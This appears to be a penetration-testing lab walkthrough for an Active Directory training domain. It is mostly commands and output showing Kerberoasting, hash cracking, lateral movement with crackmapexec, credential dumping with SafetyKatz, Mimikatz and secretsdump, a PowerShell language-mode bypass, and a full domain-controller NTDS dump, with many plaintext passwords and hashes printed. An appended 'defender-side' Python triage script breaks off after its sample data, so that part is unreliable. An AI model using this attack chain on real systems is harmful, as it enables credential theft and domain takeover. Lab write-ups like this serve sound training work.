Learning Objective - 7
PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoast
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: hashes.kerberoast
Time.Started.....: Thu Feb 22 04:26:58 2024, (1 min, 6 secs)
Time.Estimated...: Thu Feb 22 04:28:04 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Mod........: Rules (clem9669_small.rule.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 164.3 MH/s (4.97ms) @ Accel:8 Loops:128 Thr:32 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 11045180300/11045180300 (100.00%)
Rejected.........: 0/11045180300 (0.00%)
Restore.Point....: 14344390/14344390 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:384-385 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: !!sexyangel!! -> retr02301
Hardware.Mon.#1..: Temp: 62c Fan: 32% Util: 40% Core:2025MHz Mem:10251MHz Bus:16
Started: Thu Feb 22 04:26:57 2024
Stopped: Thu Feb 22 04:28:05 2024
:c
But...
So, since we have the credentials, we try:
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 -x whoami
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Executed command
SMB 172.16.4.44 445 DCORP-MGMT dcorp\ciadmin
Answer:
sqlservr.exe
[dcorp-mgmt]: PS C:\> .\SafetyKatz.exe "sekurlsa::logonPasswords full" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonPasswords full
Authentication Id : 0 ; 132376 (00000000:00020518)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:39 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
msv :
[00000003] Primary
* Username : svcadmin
* Domain : dcorp
* NTLM : b38ff50264b74508085d82c69794a4d8
* SHA1 : a4ad2cd4082079861214297e1cae954c906501b9
* DPAPI : f26ae0cc48396dccd8caa24cd33127e7
tspkg :
wdigest :
* Username : svcadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
ssp :
credman :
Answer:
b38ff50264b74508085d82c69794a4d8
impacket-secretsdump -hashes ':b38ff50264b74508085d82c69794a4d8' 'svcadmin@172.16.4.101'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0aa524e1204e0a68be320cc136ed76b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
dcorp\DCORP-ADMINSRV$:aes256-cts-hmac-sha1-96:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
dcorp\DCORP-ADMINSRV$:aes128-cts-hmac-sha1-96:83bfc18bd7f63a5921bf0ce2eb87755f
dcorp\DCORP-ADMINSRV$:des-cbc-md5:384552e53d8acdea
dcorp\DCORP-ADMINSRV$:plain_password_hex:51003a00680046005400270021004600550058005000360045005f003200290043004b002000640078006d00320076006c002a0027004e003e0061003b007a002d004e0049004d006f006700650069004200740048004d0074006a006700770040002c004c0078003a00590044002e003d002200350047005b0065002000200059002b0077004e0040005e00340034003e00490054004000730064005e0044007800510034004800570052005900360025003200300038003f006c005400450062005500600075002e0048003000640025007a005900490057002f006400400051006100540037005a00740064002700
dcorp\DCORP-ADMINSRV$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:0x15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv
dcorp\appadmin:*ActuallyTheWebServer1
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Checking the LanguageMode
[dcorp-adminsrv]: PS C:\Program Files> echo '$ExecutionContext.SessionState.LanguageMode' > test.ps1
[dcorp-adminsrv]: PS C:\Program Files> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\Program Files> .\test.ps1
FullLanguage
We add a line inside the Invoke-Mimikatz.ps1 script.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "Sekurlsa::LogonPasswords"'
Then we run Mimikatz and answer the flags.
PS C:\Program Files> .\Invoke-Mimikatz.ps1
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
616 {0;000003e7} 1 D 16097 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;00e70446} 0 D 15141446 dcorp\svcadmin S-1-5-21-719815819-3726368948-3917688648-1118 (11g,24p) Primary
* Thread Token : {0;000003e7} 1 D 18044422 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # Sekurlsa::LogonPasswords
Authentication Id : 0 ; 752154 (00000000:000b7a1a)
Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:45:15 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
msv :
[00000003] Primary
* Username : srvadmin
* Domain : dcorp
* NTLM : a98e18228819e8eec3dfa33cb68b0728
* SHA1 : f613d1bede9a620ba16ae786e242d3027809c82a
* DPAPI : a593cded7a622d70818fb3315264a140
tspkg :
wdigest :
* Username : srvadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 144880 (00000000:000235f0)
Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1114
msv :
[00000003] Primary
* Username : websvc
* Domain : dcorp
* NTLM : cc098f204c5887eaa8253e7c2749156f
* SHA1 : 36f2455c767ac9945fdc7cd276479a6a011e154b
* DPAPI : afa3166d71b438639f1c77118153d316
tspkg :
wdigest :
* Username : websvc
* Domain : dcorp
* Password : (null)
kerberos :
* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 539692 (00000000:00083c2c)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:41:47 PM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 144881 (00000000:000235f1)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
msv :
[00000003] Primary
* Username : appadmin
* Domain : dcorp
* NTLM : d549831a955fee51a43c83efb3928fa7
* SHA1 : 07de541a289d45a577f68c512c304dfcbf9e4816
* DPAPI : a5d49d98574a7574ab70fa77797c367d
tspkg :
wdigest :
* Username : appadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 21178 (00000000:000052ba)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 21140 (00000000:00005294)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 20080 (00000000:00004e70)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID :
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 --lsa
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumping LSA secrets
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/mgmtadmin:$DCC2$10240#mgmtadmin#b51b86694af5c690d2ad019fbfc00707
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes256-cts-hmac-sha1-96:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes128-cts-hmac-sha1-96:0049f234ae46eba0bfb2ced5b8c8d2b4
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:des-cbc-md5:a79234f220c4549e
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:plain_password_hex:34003f0050006800430068004b005000280060003f00790057006000450038003d0056004d00320051004900310033004f00210069002a00330051003f005700560042002200580029003d003e0049006c0033003d00410063007a004a0030005e005400210058005d00720026003a002600790047003400310060002a002f0024005e0034002b00450065005a00300037003f007a00460032005a00330060003a005b004a0064002a0046002f007a005f00500060007000360042003900580048005e00670024002a006d005800490051004d00580059002800530063003f0033005c00410036004900430072005800
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.4.44 445 DCORP-MGMT dpapi_machinekey:0xb3084493f6af9cf8b2964ee53accccd428737b2c
dpapi_userkey:0xe46d070e975b2473e749e7927a64a61fe1575b20
SMB 172.16.4.44 445 DCORP-MGMT NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.4.44 445 DCORP-MGMT dcorp\svcadmin:*ThisisBlasphemyThisisMadness!!
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.secrets and /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.cached
We test the new creds.
crackmapexec smb 172.16.4.44 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
We get the domain's IP.
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> nslookup.exe dollarcorp.moneycorp.local
Server: UnKnown
Address: 172.16.2.1
Name: dollarcorp.moneycorp.local
Address: 172.16.2.1
We test the creds on the DC.
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
And we dump all the hashes.
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --sam
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping SAM hashes
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:a102ad5753f4c441e3af31c97fad86fd:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB 172.16.2.1 445 DCORP-DC [+] Added 3 SAM hashes to the database
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --lsa
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping LSA secrets
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes256-cts-hmac-sha1-96:f4583f2be42c52751be1ce4e8f51c3c256c89be2b41e0b6c57c8f2cd4edadfcf
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes128-cts-hmac-sha1-96:10715e504e5e3b6825f0a58aabd03108
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:des-cbc-md5:bc321ad310ce1ab5
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:plain_password_hex:9d2b4437a83b9f4b7038e6fdb58f506b95726a3034a92bac398a7dd61856d91ce33067a9d945f051ed1b1de95feffd32eef8481b25306953859d7242259108676568b30259b28570e0fe906928f4fcf1ae5698ae526b7c17b02a43e90b7fc2902351adc7f1bd3e8e03c0050123b1db24af4397449ebd8ea44347e68071d76a9a78b1f315229f3a2915397621d8cb968518d4937dd8ea46a988276c15a85bf0f7db00800120c318d73cdff23562b8e5d96af5754c507a760e9ba73c4ce67cb74b349f340fdd8dc9e0bac7ebd390afa440c23c8e0059de3f472359c205f7ddea65ae0efd662a35d7dc0335968eeb642886
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC dpapi_machinekey:0x558f948af84f9dec3acf3499b5e9af0de2d8e803
dpapi_userkey:0xb1b020a793cbecd7d3ad7aacbc6b73f33c9e4d43
SMB 172.16.2.1 445 DCORP-DC NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB 172.16.2.1 445 DCORP-DC [+] Dumped 7 LSA secrets to /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.secrets and /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.cached
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB 172.16.2.1 445 DCORP-DC sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB 172.16.2.1 445 DCORP-DC websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB 172.16.2.1 445 DCORP-DC srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB 172.16.2.1 445 DCORP-DC svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB 172.16.2.1 445 DCORP-DC mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
SMB 172.16.2.1 445 DCORP-DC ciadmin\ciadmin:1121:aad3b435b51404eeaad3b435b51404ee:e08253add90dccf1a208523d02998c3d:::
SMB 172.16.2.1 445 DCORP-DC sql1admin\sql1admin:1122:aad3b435b51404eeaad3b435b51404ee:e999ae4bd06932620a1e78d2112138c6:::
SMB 172.16.2.1 445 DCORP-DC dollarcorp.moneycorp.local\studentadmin:4181:aad3b435b51404eeaad3b435b51404ee:d1254f303421d3cdbdc4c73a5bce0201:::
SMB 172.16.2.1 445 DCORP-DC DCORP-DC$:1000:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC DCORP-ADMINSRV$:1105:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
SMB 172.16.2.1 445 DCORP-DC DCORP-APPSRV$:1106:aad3b435b51404eeaad3b435b51404ee:b4cb7bf8b93c78b8051c7906bb054dc5:::
SMB 172.16.2.1 445 DCORP-DC DCORP-CI$:1107:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MGMT$:1108:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MSSQL$:1109:aad3b435b51404eeaad3b435b51404ee:b205f1ca05bedace801893d6aa5aca27:::
SMB 172.16.2.1 445 DCORP-DC DCORP-SQL1$:1110:aad3b435b51404eeaad3b435b51404ee:3686dfb420dc0f9635e70c6ca5875b49:::
SMB 172.16.2.1 445 DCORP-DC DCORP-STDADMIN$:4202:aad3b435b51404eeaad3b435b51404ee:e444bbf444732fc38065ea9e9255ab03:::
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
Answer:
b38ff50264b74508085d82c69794a4d8
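The dumps above say more than the flag answer: in the NTDS output srvadmin and svcadmin carry the same NT hash (b38ff502...), i.e. the same password, and the LSA secrets expose cached logons plus plaintext service-account passwords for websvc and appadmin. As an added defender-side example (not part of the original writeup or of any tool shown on it), this Python script triages dump output in the format printed by secretsdump and CrackMapExec --sam/--lsa/--ntds: it flags NT-hash reuse between accounts, empty-password hashes, and every identity that has to be rotated. The sample lines, host names and hashes are constructed, except the well-known NT hash of the empty password.

```python
import re
from collections import defaultdict

# Constructed sample in the format secretsdump and CrackMapExec (--sam/--lsa/--ntds)
# print; hashes are placeholders except 31d6cfe0..., the NT hash of the empty password.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
EXAMPLE.LOCAL/websvc:$DCC2$10240#websvc#11111111111111111111111111111111
[*] Dumping LSA Secrets
[*] _SC_SNMPTRAP
example\\websvc:ConstructedServicePassword1
SMB 10.0.0.5 445 EX-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.0.0.5 445 EX-DC srvadmin\\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
SMB 10.0.0.5 445 EX-DC svcadmin\\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
SMB 10.0.0.5 445 EX-DC EX-DC$:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""

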